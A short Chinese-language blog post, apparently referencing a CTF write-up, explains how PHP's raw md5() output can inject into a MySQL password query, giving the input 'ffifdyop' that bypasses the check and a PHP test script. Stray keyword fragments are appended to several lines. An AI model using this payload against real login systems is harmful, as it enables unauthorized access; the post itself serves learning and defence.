今天看到$sql = "SELECT * FROM admin WHERE pass = '".md5($password,true)."'";
這樣一個sql,其實能夠注入。php
思路比較明確,當md5後的hex轉換成字符串後,若是包含'or'<trash>
這樣的字符串,那整個sql變成mysql
SELECT * FROM admin WHERE pass = ''or'6<trash>'
很明顯能夠注入了。sql
難點就在如何尋找這樣的字符串,我只是順手牽羊,牽了一個。。
提供一個字符串:ffifdyop
md5後,276f722736c95d99e921722cf9ed621c
再轉成字符串:'or'6<trash>
數據庫
測試代碼:post
<?php error_reporting(0); $link = mysql_connect('localhost', 'root', ''); if (!$link) { die('Could not connect to MySQL: ' . mysql_error()); } // 選擇數據庫 $db = mysql_select_db("test", $link); if(!$db) { echo 'select db error'; exit(); } // 執行sql $password = "ffifdyop"; $sql = "SELECT * FROM admin WHERE pass = '".md5($password,true)."'"; var_dump($sql); $result=mysql_query($sql) or die('<pre>' . mysql_error() . '</pre>' ); $row1 = mysql_fetch_row($result); var_dump($row1); mysql_close($link); ?>
效果:
測試
參考:
http://mslc.ctf.su/wp/leet-more-2010-oh-those-admins-writeup/
http://cvk.posthaven.com/sql-injection-with-raw-md5-hashesfetch